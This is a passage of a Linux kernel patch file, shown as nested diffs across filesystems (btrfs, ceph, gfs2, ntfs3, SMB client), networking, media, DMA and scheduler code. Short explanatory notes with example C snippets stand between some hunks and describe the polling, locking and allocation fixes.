+ 	return 0;
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 836babd23db52..9bc7ac06c5177 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -1436,7 +1436,7 @@ int btrfs_load_block_group_zone_info(struct btrfs_block_group *cache, bool new)
+ 	}
+ 
+ 	if (num_sequential > 0)
+-		cache->seq_zone = true;
++		set_bit(BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE, &cache->runtime_flags);
+ 
+ 	if (num_conventional > 0) {
+ 		/* Zone capacity is always zone size in emulation */
+@@ -1658,7 +1658,7 @@ bool btrfs_use_zone_append(struct btrfs_inode *inode, u64 start)
+ 	if (!cache)
+ 		return false;
+ 
+-	ret = cache->seq_zone;
++	ret = !!test_bit(BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE, &cache->runtime_flags);
+ 	btrfs_put_block_group(cache);
+ 
+ 	return ret;
+@@ -2177,7 +2177,8 @@ static void btrfs_zone_finish_endio_workfn(struct work_struct *work)
+ void btrfs_schedule_zone_finish_bg(struct btrfs_block_group *bg,
+ 				   struct extent_buffer *eb)
+ {
+-	if (!bg->seq_zone || eb->start + eb->len * 2 <= bg->start + bg->zone_capacity)
++	if (!test_bit(BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE, &bg->runtime_flags) ||
++	    eb->start + eb->len * 2 <= bg->start + bg->zone_capacity)
+ 		return;
+ 
+ 	if (WARN_ON(bg->zone_finish_work.func == btrfs_zone_finish_endio_workfn)) {
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index dcabe2783edfe..5399a9ea5b4f1 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -645,6 +645,7 @@ bad:
+ 	err = -EIO;
+ out_bad:
+ 	pr_err("mds parse_reply err %d\n", err);
++	ceph_msg_dump(msg);
+ 	return err;
+ }
+ 
+@@ -3534,6 +3535,7 @@ static void handle_forward(struct ceph_mds_client *mdsc,
+ 
+ bad:
+ 	pr_err("mdsc_handle_forward decode error err=%d\n", err);
++	ceph_msg_dump(msg);
+ }
+ 
+ static int __decode_session_metadata(void **p, void *end,
+@@ -5254,6 +5256,7 @@ void ceph_mdsc_handle_fsmap(struct ceph_mds_client *mdsc, struct ceph_msg *msg)
+ bad:
+ 	pr_err("error decoding fsmap %d. Shutting down mount.\n", err);
+ 	ceph_umount_begin(mdsc->fsc->sb);
++	ceph_msg_dump(msg);
+ err_out:
+ 	mutex_lock(&mdsc->mutex);
+ 	mdsc->mdsmap_err = err;
+@@ -5322,6 +5325,7 @@ bad_unlock:
+ bad:
+ 	pr_err("error decoding mdsmap %d. Shutting down mount.\n", err);
+ 	ceph_umount_begin(mdsc->fsc->sb);
++	ceph_msg_dump(msg);
+ 	return;
+ }
+ 
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 9d27aa8bd2bc6..44c564f0bc622 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -981,7 +981,14 @@ static int gfs2_show_options(struct seq_file *s, struct dentry *root)
+ {
+ 	struct gfs2_sbd *sdp = root->d_sb->s_fs_info;
+ 	struct gfs2_args *args = &sdp->sd_args;
+-	int val;
++	unsigned int logd_secs, statfs_slow, statfs_quantum, quota_quantum;
++
++	spin_lock(&sdp->sd_tune.gt_spin);
++	logd_secs = sdp->sd_tune.gt_logd_secs;
++	quota_quantum = sdp->sd_tune.gt_quota_quantum;
++	statfs_quantum = sdp->sd_tune.gt_statfs_quantum;
++	statfs_slow = sdp->sd_tune.gt_statfs_slow;
++	spin_unlock(&sdp->sd_tune.gt_spin);
+ 
+ 	if (is_ancestor(root, sdp->sd_master_dir))
+ 		seq_puts(s, ",meta");
+@@ -1036,17 +1043,14 @@ static int gfs2_show_options(struct seq_file *s, struct dentry *root)
+ 	}
+ 	if (args->ar_discard)
+ 		seq_puts(s, ",discard");
+-	val = sdp->sd_tune.gt_logd_secs;
+-	if (val != 30)
+-		seq_printf(s, ",commit=%d", val);
+-	val = sdp->sd_tune.gt_statfs_quantum;
+-	if (val != 30)
+-		seq_printf(s, ",statfs_quantum=%d", val);
+-	else if (sdp->sd_tune.gt_statfs_slow)
++	if (logd_secs != 30)
++		seq_printf(s, ",commit=%d", logd_secs);
++	if (statfs_quantum != 30)
++		seq_printf(s, ",statfs_quantum=%d", statfs_quantum);
++	else if (statfs_slow)
+ 		seq_puts(s, ",statfs_quantum=0");
+-	val = sdp->sd_tune.gt_quota_quantum;
+-	if (val != 60)
+-		seq_printf(s, ",quota_quantum=%d", val);
++	if (quota_quantum != 60)
++		seq_printf(s, ",quota_quantum=%d", quota_quantum);
+ 	if (args->ar_statfs_percent)
+ 		seq_printf(s, ",statfs_percent=%d", args->ar_statfs_percent);
+ 	if (args->ar_errors != GFS2_ERRORS_DEFAULT) {
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index b1b476fb7229b..dda13e1f1b330 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -874,6 +874,7 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 	if (err)
+ 		goto out1;
+ 
++	err = -EINVAL;
+ 	/* Call mi_remove_attr() in reverse order to keep pointers 'arr_move' valid. */
+ 	while (to_free > 0) {
+ 		struct ATTRIB *b = arr_move[--nb];
+@@ -882,7 +883,8 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 
+ 		attr = mi_insert_attr(mi, b->type, Add2Ptr(b, name_off),
+ 				      b->name_len, asize, name_off);
+-		WARN_ON(!attr);
++		if (!attr)
++			goto out1;
+ 
+ 		mi_get_ref(mi, &le_b[nb]->ref);
+ 		le_b[nb]->id = attr->id;
+@@ -892,17 +894,20 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 		attr->id = le_b[nb]->id;
+ 
+ 		/* Remove from primary record. */
+-		WARN_ON(!mi_remove_attr(NULL, &ni->mi, b));
++		if (!mi_remove_attr(NULL, &ni->mi, b))
++			goto out1;
+ 
+ 		if (to_free <= asize)
+ 			break;
+ 		to_free -= asize;
+-		WARN_ON(!nb);
++		if (!nb)
++			goto out1;
+ 	}
+ 
+ 	attr = mi_insert_attr(&ni->mi, ATTR_LIST, NULL, 0,
+ 			      lsize + SIZEOF_RESIDENT, SIZEOF_RESIDENT);
+-	WARN_ON(!attr);
++	if (!attr)
++		goto out1;
+ 
+ 	attr->non_res = 0;
+ 	attr->flags = 0;
+@@ -922,9 +927,10 @@ out1:
+ 	kfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.size = 0;
++	return err;
+ 
+ out:
+-	return err;
++	return 0;
+ }
+ 
+ /*
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index b6e22bcb929ba..829b62d3bb889 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -154,7 +154,7 @@ int ntfs_fix_post_read(struct NTFS_RECORD_HEADER *rhdr, size_t bytes,
+ 	/* Check errors. */
+ 	if ((fo & 1) || fo + fn * sizeof(short) > SECTOR_SIZE || !fn-- ||
+ 	    fn * SECTOR_SIZE > bytes) {
+-		return -EINVAL; /* Native chkntfs returns ok! */
++		return -E_NTFS_CORRUPT;
+ 	}
+ 
+ 	/* Get fixup pointer. */
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 9e9a9ffd92958..495cfb37962fa 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1103,6 +1103,12 @@ ok:
+ 	*node = in;
+ 
+ out:
++	if (err == -E_NTFS_CORRUPT) {
++		ntfs_inode_err(&ni->vfs_inode, "directory corrupted");
++		ntfs_set_state(ni->mi.sbi, NTFS_DIRTY_ERROR);
++		err = -EINVAL;
++	}
++
+ 	if (ib != in->index)
+ 		kfree(ib);
+ 
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 24227b2e1b2b0..8c9abaf139e67 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -53,6 +53,8 @@ enum utf16_endian;
+ #define E_NTFS_NONRESIDENT		556
+ /* NTFS specific error code about punch hole. */
+ #define E_NTFS_NOTALIGNED		557
++/* NTFS specific error code when on-disk struct is corrupted. */
++#define E_NTFS_CORRUPT			558
+ 
+ 
+ /* sbi->flags */
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index af1e4b364ea8e..ba336c7280b85 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -124,7 +124,7 @@ int mi_read(struct mft_inode *mi, bool is_mft)
+ 	struct rw_semaphore *rw_lock = NULL;
+ 
+ 	if (is_mounted(sbi)) {
+-		if (!is_mft) {
++		if (!is_mft && mft_ni) {
+ 			rw_lock = &mft_ni->file.run_lock;
+ 			down_read(rw_lock);
+ 		}
+@@ -148,7 +148,7 @@ int mi_read(struct mft_inode *mi, bool is_mft)
+ 		ni_lock(mft_ni);
+ 		down_write(rw_lock);
+ 	}
+-	err = attr_load_runs_vcn(mft_ni, ATTR_DATA, NULL, 0, &mft_ni->file.run,
++	err = attr_load_runs_vcn(mft_ni, ATTR_DATA, NULL, 0, run,
+ 				 vbo >> sbi->cluster_bits);
+ 	if (rw_lock) {
+ 		up_write(rw_lock);
+@@ -180,6 +180,12 @@ ok:
+ 	return 0;
+ 
+ out:
++	if (err == -E_NTFS_CORRUPT) {
++		ntfs_err(sbi->sb, "mft corrupted");
++		ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
++		err = -EINVAL;
++	}
++
+ 	return err;
+ }
+ 
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 078df1e2dd18a..18d66497c42d1 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -883,11 +883,11 @@ struct dentry *
+ cifs_smb3_do_mount(struct file_system_type *fs_type,
+ 	      int flags, struct smb3_fs_context *old_ctx)
+ {
+-	int rc;
+-	struct super_block *sb = NULL;
+-	struct cifs_sb_info *cifs_sb = NULL;
+ 	struct cifs_mnt_data mnt_data;
++	struct cifs_sb_info *cifs_sb;
++	struct super_block *sb;
+ 	struct dentry *root;
++	int rc;
+ 
+ 	/*
+ 	 * Prints in Kernel / CIFS log the attempted mount operation
+@@ -898,11 +898,9 @@ cifs_smb3_do_mount(struct file_system_type *fs_type,
+ 	else
+ 		cifs_info("Attempting to mount %s\n", old_ctx->UNC);
+ 
+-	cifs_sb = kzalloc(sizeof(struct cifs_sb_info), GFP_KERNEL);
+-	if (cifs_sb == NULL) {
+-		root = ERR_PTR(-ENOMEM);
+-		goto out;
+-	}
++	cifs_sb = kzalloc(sizeof(*cifs_sb), GFP_KERNEL);
++	if (!cifs_sb)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	cifs_sb->ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
+ 	if (!cifs_sb->ctx) {
+@@ -945,10 +943,8 @@ cifs_smb3_do_mount(struct file_system_type *fs_type,
+ 
+ 	sb = sget(fs_type, cifs_match_super, cifs_set_super, flags, &mnt_data);
+ 	if (IS_ERR(sb)) {
+-		root = ERR_CAST(sb);
+ 		cifs_umount(cifs_sb);
+-		cifs_sb = NULL;
+-		goto out;
++		return ERR_CAST(sb);
+ 	}
+ 
+ 	if (sb->s_root) {
+@@ -979,13 +975,9 @@ out_super:
+ 	deactivate_locked_super(sb);
+ 	return root;
+ out:
+-	if (cifs_sb) {
+-		if (!sb || IS_ERR(sb)) {  /* otherwise kill_sb will handle */
+-			kfree(cifs_sb->prepath);
+-			smb3_cleanup_fs_context(cifs_sb->ctx);
+-			kfree(cifs_sb);
+-		}
+-	}
++	kfree(cifs_sb->prepath);
++	smb3_cleanup_fs_context(cifs_sb->ctx);
++	kfree(cifs_sb);
+ 	return root;
+ }
+ 
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 27c6d14e369f1..0f3405e0f2e48 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -4885,9 +4885,9 @@ static int cifs_readpage_worker(struct file *file, struct page *page,
+ 
+ io_error:
+ 	kunmap(page);
+-	unlock_page(page);
+ 
+ read_complete:
++	unlock_page(page);
+ 	return rc;
+ }
+ 
+@@ -5082,9 +5082,11 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct cifsFileInfo *cfile = container_of(work, struct cifsFileInfo,
+ 						  oplock_break);
+ 	struct inode *inode = d_inode(cfile->dentry);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+ 	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct tcon_link *tlink;
+ 	int rc = 0;
+ 	bool purge_cache = false, oplock_break_cancelled;
+ 	__u64 persistent_fid, volatile_fid;
+@@ -5093,6 +5095,12 @@ void cifs_oplock_break(struct work_struct *work)
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+ 
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		goto out;
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
+ 	server->ops->downgrade_oplock(server, cinode, cfile->oplock_level,
+ 				      cfile->oplock_epoch, &purge_cache);
+ 
+@@ -5142,18 +5150,19 @@ oplock_break_ack:
+ 	/*
+ 	 * MS-SMB2 3.2.5.19.1 and 3.2.5.19.2 (and MS-CIFS 3.2.5.42) do not require
+ 	 * an acknowledgment to be sent when the file has already been closed.
+-	 * check for server null, since can race with kill_sb calling tree disconnect.
+ 	 */
+ 	spin_lock(&cinode->open_file_lock);
+-	if (tcon->ses && tcon->ses->server && !oplock_break_cancelled &&
+-					!list_empty(&cinode->openFileList)) {
++	/* check list empty since can race with kill_sb calling tree disconnect */
++	if (!oplock_break_cancelled && !list_empty(&cinode->openFileList)) {
+ 		spin_unlock(&cinode->open_file_lock);
+-		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+-						volatile_fid, net_fid, cinode);
++		rc = server->ops->oplock_response(tcon, persistent_fid,
++						  volatile_fid, net_fid, cinode);
+ 		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+ 	} else
+ 		spin_unlock(&cinode->open_file_lock);
+ 
++	cifs_put_tlink(tlink);
++out:
+ 	cifs_done_oplock_break(cinode);
+ }
+ 
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 3ca593cdda76e..ba46156e32680 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -3841,6 +3841,12 @@ void smb2_reconnect_server(struct work_struct *work)
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_EXITING) {
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
++		spin_unlock(&ses->ses_lock);
+ 
+ 		tcon_selected = false;
+ 
+diff --git a/include/kvm/arm_vgic.h b/include/kvm/arm_vgic.h
+index 4df9e73a8bb5f..1d7d4cffaefc6 100644
+--- a/include/kvm/arm_vgic.h
++++ b/include/kvm/arm_vgic.h
+@@ -429,6 +429,6 @@ int kvm_vgic_v4_unset_forwarding(struct kvm *kvm, int irq,
+ 
+ int vgic_v4_load(struct kvm_vcpu *vcpu);
+ void vgic_v4_commit(struct kvm_vcpu *vcpu);
+-int vgic_v4_put(struct kvm_vcpu *vcpu, bool need_db);
++int vgic_v4_put(struct kvm_vcpu *vcpu);
+ 
+ #endif /* __KVM_ARM_VGIC_H */
+diff --git a/include/linux/iopoll.h b/include/linux/iopoll.h
+index 2c8860e406bd8..0417360a6db9b 100644
+--- a/include/linux/iopoll.h
++++ b/include/linux/iopoll.h
+@@ -53,6 +53,7 @@
+ 		} \
+ 		if (__sleep_us) \
+ 			usleep_range((__sleep_us >> 2) + 1, __sleep_us); \
++		cpu_relax(); \
+ 	} \
+ 	(cond) ? 0 : -ETIMEDOUT; \
+ })
+@@ -95,6 +96,7 @@
+ 		} \
+ 		if (__delay_us) \
+ 			udelay(__delay_us); \
++		cpu_relax(); \
+ 	} \
+ 	(cond) ? 0 : -ETIMEDOUT; \
+ })
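Both polling macros above gain a cpu_relax() at the bottom of their loops. The
change matters most when a caller passes a zero sleep/delay interval and the
macro degenerates into a pure busy-wait: cpu_relax() hints to the CPU that it
is spinning (easing pressure on SMT siblings and the memory pipeline) without
leaving the loop. A hand-rolled, kernel-style equivalent of what such a poll
macro expands to, using a hypothetical device register and ready bit:

	#include <linux/bits.h>
	#include <linux/errno.h>
	#include <linux/io.h>
	#include <linux/ktime.h>

	static int poll_ready_bit(void __iomem *reg, u64 timeout_us)
	{
		ktime_t deadline = ktime_add_us(ktime_get(), timeout_us);

		for (;;) {
			if (readl(reg) & BIT(0))	/* the "cond" */
				return 0;
			if (ktime_compare(ktime_get(), deadline) > 0)
				return (readl(reg) & BIT(0)) ? 0 : -ETIMEDOUT;
			cpu_relax();	/* what the hunk adds to each iteration */
		}
	}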
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index a960de68ac69e..6047058d67037 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -148,6 +148,10 @@ retry:
+ 		if (gso_type & SKB_GSO_UDP)
+ 			nh_off -= thlen;
+ 
++		/* Kernel has a special handling for GSO_BY_FRAGS. */
++		if (gso_size == GSO_BY_FRAGS)
++			return -EINVAL;
++
+ 		/* Too small packets are not really GSO ones. */
+ 		if (skb->len - nh_off > gso_size) {
+ 			shinfo->gso_size = gso_size;
+diff --git a/include/media/v4l2-mem2mem.h b/include/media/v4l2-mem2mem.h
+index bb9de6a899e07..d6c8eb2b52019 100644
+--- a/include/media/v4l2-mem2mem.h
++++ b/include/media/v4l2-mem2mem.h
+@@ -593,7 +593,14 @@ void v4l2_m2m_buf_queue(struct v4l2_m2m_ctx *m2m_ctx,
+ static inline
+ unsigned int v4l2_m2m_num_src_bufs_ready(struct v4l2_m2m_ctx *m2m_ctx)
+ {
+-	return m2m_ctx->out_q_ctx.num_rdy;
++	unsigned int num_buf_rdy;
++	unsigned long flags;
++
++	spin_lock_irqsave(&m2m_ctx->out_q_ctx.rdy_spinlock, flags);
++	num_buf_rdy = m2m_ctx->out_q_ctx.num_rdy;
++	spin_unlock_irqrestore(&m2m_ctx->out_q_ctx.rdy_spinlock, flags);
++
++	return num_buf_rdy;
+ }
+ 
+ /**
+@@ -605,7 +612,14 @@ unsigned int v4l2_m2m_num_src_bufs_ready(struct v4l2_m2m_ctx *m2m_ctx)
+ static inline
+ unsigned int v4l2_m2m_num_dst_bufs_ready(struct v4l2_m2m_ctx *m2m_ctx)
+ {
+-	return m2m_ctx->cap_q_ctx.num_rdy;
++	unsigned int num_buf_rdy;
++	unsigned long flags;
++
++	spin_lock_irqsave(&m2m_ctx->cap_q_ctx.rdy_spinlock, flags);
++	num_buf_rdy = m2m_ctx->cap_q_ctx.num_rdy;
++	spin_unlock_irqrestore(&m2m_ctx->cap_q_ctx.rdy_spinlock, flags);
++
++	return num_buf_rdy;
+ }
+ 
+ /**
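num_rdy is updated with the queue's rdy_spinlock held (buffers complete from
interrupt context), so the previous lock-free read could race with a concurrent
update. The getters now take the same lock with interrupts saved and copy the
counter out — the classic locked-snapshot pattern. A generic form (the helper
name is illustrative):

	#include <linux/spinlock.h>
	#include <media/v4l2-mem2mem.h>

	static unsigned int snapshot_ready_count(struct v4l2_m2m_queue_ctx *q_ctx)
	{
		unsigned int num;
		unsigned long flags;

		/* match the IRQ-context writers: disable irqs while holding it */
		spin_lock_irqsave(&q_ctx->rdy_spinlock, flags);
		num = q_ctx->num_rdy;
		spin_unlock_irqrestore(&q_ctx->rdy_spinlock, flags);

		return num;
	}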
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 1bbdddcf61542..699408944952c 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1445,6 +1445,12 @@ static inline bool sk_has_memory_pressure(const struct sock *sk)
+ 	return sk->sk_prot->memory_pressure != NULL;
+ }
+ 
++static inline bool sk_under_global_memory_pressure(const struct sock *sk)
++{
++	return sk->sk_prot->memory_pressure &&
++		!!*sk->sk_prot->memory_pressure;
++}
++
+ static inline bool sk_under_memory_pressure(const struct sock *sk)
+ {
+ 	if (!sk->sk_prot->memory_pressure)
+diff --git a/kernel/dma/remap.c b/kernel/dma/remap.c
+index b4526668072e7..27596f3b4aef3 100644
+--- a/kernel/dma/remap.c
++++ b/kernel/dma/remap.c
+@@ -43,13 +43,13 @@ void *dma_common_contiguous_remap(struct page *page, size_t size,
+ 	void *vaddr;
+ 	int i;
+ 
+-	pages = kmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
++	pages = kvmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
+ 	if (!pages)
+ 		return NULL;
+ 	for (i = 0; i < count; i++)
+ 		pages[i] = nth_page(page, i);
+ 	vaddr = vmap(pages, count, VM_DMA_COHERENT, prot);
+-	kfree(pages);
++	kvfree(pages);
+ 
+ 	return vaddr;
+ }
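For a large contiguous remap, count can reach hundreds of thousands of entries,
and the temporary struct page * table then exceeds what a high-order kmalloc()
can reliably provide. kvmalloc_array() keeps the fast kmalloc path for small
counts and transparently falls back to vmalloc() for big ones; kvfree()
releases either variant. Illustrative usage (the wrapper names are
hypothetical):

	#include <linux/mm.h>
	#include <linux/slab.h>

	static struct page **alloc_page_table(size_t count)
	{
		/* kmalloc if it fits, vmalloc fallback otherwise */
		return kvmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
	}

	static void free_page_table(struct page **pages)
	{
		kvfree(pages);	/* handles both allocation flavours */
	}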
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 5e5aea2360a87..612873ec2197f 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4464,17 +4464,9 @@ static inline int util_fits_cpu(unsigned long util,
+ 	 *
+ 	 * For uclamp_max, we can tolerate a drop in performance level as the
+ 	 * goal is to cap the task. So it's okay if it's getting less.
+-	 *
+-	 * In case of capacity inversion we should honour the inverted capacity
+-	 * for both uclamp_min and uclamp_max all the time.
+ 	 */
+-	capacity_orig = cpu_in_capacity_inversion(cpu);
+-	if (capacity_orig) {
+-		capacity_orig_thermal = capacity_orig;
+-	} else {
+-		capacity_orig = capacity_orig_of(cpu);
+-		capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
+-	}
++	capacity_orig = capacity_orig_of(cpu);
++	capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
+ 
+ 	/*
+ 	 * We want to force a task to fit a cpu as implied by uclamp_max.
+@@ -4549,8 +4541,8 @@ static inline int util_fits_cpu(unsigned long util,
+ 	 * handle the case uclamp_min > uclamp_max.
+ 	 */
+ 	uclamp_min = min(uclamp_min, uclamp_max);
+-	if (util < uclamp_min && capacity_orig != SCHED_CAPACITY_SCALE)
+-		fits = fits && (uclamp_min <= capacity_orig_thermal);
++	if (fits && (util < uclamp_min) && (uclamp_min > capacity_orig_thermal))
++		return -1;
+ 
+ 	return fits;
+ }
+@@ -4560,7 +4552,11 @@ static inline int task_fits_cpu(struct task_struct *p, int cpu)
+ 	unsigned long uclamp_min = uclamp_eff_value(p, UCLAMP_MIN);
+ 	unsigned long uclamp_max = uclamp_eff_value(p, UCLAMP_MAX);
+ 	unsigned long util = task_util_est(p);
+-	return util_fits_cpu(util, uclamp_min, uclamp_max, cpu);
++	/*
++	 * Return true only if the cpu fully fits the task requirements, which
++	 * include the utilization but also the performance hints.
++	 */
++	return (util_fits_cpu(util, uclamp_min, uclamp_max, cpu) > 0);
+ }
+ 
+ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+@@ -6043,6 +6039,7 @@ static inline bool cpu_overutilized(int cpu)
+ 	unsigned long rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
+ 	unsigned long rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
+ 
++	/* Return true only if the utilization doesn't fit CPU's capacity */
+ 	return !util_fits_cpu(cpu_util_cfs(cpu), rq_util_min, rq_util_max, cpu);
+ }
+ 
+@@ -6836,6 +6833,7 @@ static int
+ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+ 	unsigned long task_util, util_min, util_max, best_cap = 0;
++	int fits, best_fits = 0;
+ 	int cpu, best_cpu = -1;
+ 	struct cpumask *cpus;
+ 
+@@ -6851,12 +6849,28 @@ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ 
+ 		if (!available_idle_cpu(cpu) && !sched_idle_cpu(cpu))
+ 			continue;
+-		if (util_fits_cpu(task_util, util_min, util_max, cpu))
++
++		fits = util_fits_cpu(task_util, util_min, util_max, cpu);
++
++		/* This CPU fits with all requirements */
++		if (fits > 0)
+ 			return cpu;
++		/*
++		 * Only the min performance hint (i.e. uclamp_min) doesn't fit.
++		 * Look for the CPU with best capacity.
++		 */
++		else if (fits < 0)
++			cpu_cap = capacity_orig_of(cpu) - thermal_load_avg(cpu_rq(cpu));
+ 
+-		if (cpu_cap > best_cap) {
++		/*
++		 * First, select CPU which fits better (-1 being better than 0).
++		 * Then, select the one with best capacity at same level.
++		 */
++		if ((fits < best_fits) ||
++		    ((fits == best_fits) && (cpu_cap > best_cap))) {
+ 			best_cap = cpu_cap;
+ 			best_cpu = cpu;
++			best_fits = fits;
+ 		}
+ 	}
+ 
+@@ -6869,7 +6883,11 @@ static inline bool asym_fits_cpu(unsigned long util,
+ 				 int cpu)
+ {
+ 	if (sched_asym_cpucap_active())
+-		return util_fits_cpu(util, util_min, util_max, cpu);
++		/*
++		 * Return true only if the cpu fully fits the task requirements
++		 * which include the utilization and the performance hints.
++		 */
++		return (util_fits_cpu(util, util_min, util_max, cpu) > 0);
+ 
+ 	return true;
+ }
+@@ -7236,6 +7254,9 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	unsigned long p_util_max = uclamp_is_used() ? uclamp_eff_value(p, UCLAMP_MAX) : 1024;
+ 	struct root_domain *rd = this_rq()->rd;
+ 	int cpu, best_energy_cpu, target = -1;
++	int prev_fits = -1, best_fits = -1;
++	unsigned long best_thermal_cap = 0;
++	unsigned long prev_thermal_cap = 0;
+ 	struct sched_domain *sd;
+ 	struct perf_domain *pd;
+ 	struct energy_env eenv;
+@@ -7271,6 +7292,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		unsigned long prev_spare_cap = 0;
+ 		int max_spare_cap_cpu = -1;
+ 		unsigned long base_energy;
++		int fits, max_fits = -1;
+ 
+ 		cpumask_and(cpus, perf_domain_span(pd), cpu_online_mask);
+ 
+@@ -7320,7 +7342,9 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 				util_min = max(rq_util_min, p_util_min);
+ 				util_max = max(rq_util_max, p_util_max);
+ 			}
+-			if (!util_fits_cpu(util, util_min, util_max, cpu))
++
++			fits = util_fits_cpu(util, util_min, util_max, cpu);
++			if (!fits)
+ 				continue;
+ 
+ 			lsub_positive(&cpu_cap, util);
+@@ -7328,7 +7352,9 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			if (cpu == prev_cpu) {
+ 				/* Always use prev_cpu as a candidate. */
+ 				prev_spare_cap = cpu_cap;
+-			} else if (cpu_cap > max_spare_cap) {
++				prev_fits = fits;
++			} else if ((fits > max_fits) ||
++				   ((fits == max_fits) && (cpu_cap > max_spare_cap))) {
+ 				/*
+ 				 * Find the CPU with the maximum spare capacity
+ 				 * among the remaining CPUs in the performance
+@@ -7336,6 +7362,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 				 */
+ 				max_spare_cap = cpu_cap;
+ 				max_spare_cap_cpu = cpu;
++				max_fits = fits;
+ 			}
+ 		}
+ 
+@@ -7354,26 +7381,50 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			if (prev_delta < base_energy)
+ 				goto unlock;
+ 			prev_delta -= base_energy;
++			prev_thermal_cap = cpu_thermal_cap;
+ 			best_delta = min(best_delta, prev_delta);
+ 		}
+ 
+ 		/* Evaluate the energy impact of using max_spare_cap_cpu. */
+ 		if (max_spare_cap_cpu >= 0 && max_spare_cap > prev_spare_cap) {
++			/* Current best energy cpu fits better */
++			if (max_fits < best_fits)
++				continue;
++
++			/*
++			 * Both don't fit performance hint (i.e. uclamp_min)
++			 * but best energy cpu has better capacity.
++			 */
++			if ((max_fits < 0) &&
++			    (cpu_thermal_cap <= best_thermal_cap))
++				continue;
++
+ 			cur_delta = compute_energy(&eenv, pd, cpus, p,
+ 						   max_spare_cap_cpu);
+ 			/* CPU utilization has changed */
+ 			if (cur_delta < base_energy)
+ 				goto unlock;
+ 			cur_delta -= base_energy;
+-			if (cur_delta < best_delta) {
+-				best_delta = cur_delta;
+-				best_energy_cpu = max_spare_cap_cpu;
+-			}
++
++			/*
++			 * Both fit for the task but best energy cpu has lower
++			 * energy impact.
++			 */
++			if ((max_fits > 0) && (best_fits > 0) &&
++			    (cur_delta >= best_delta))
++				continue;
++
++			best_delta = cur_delta;
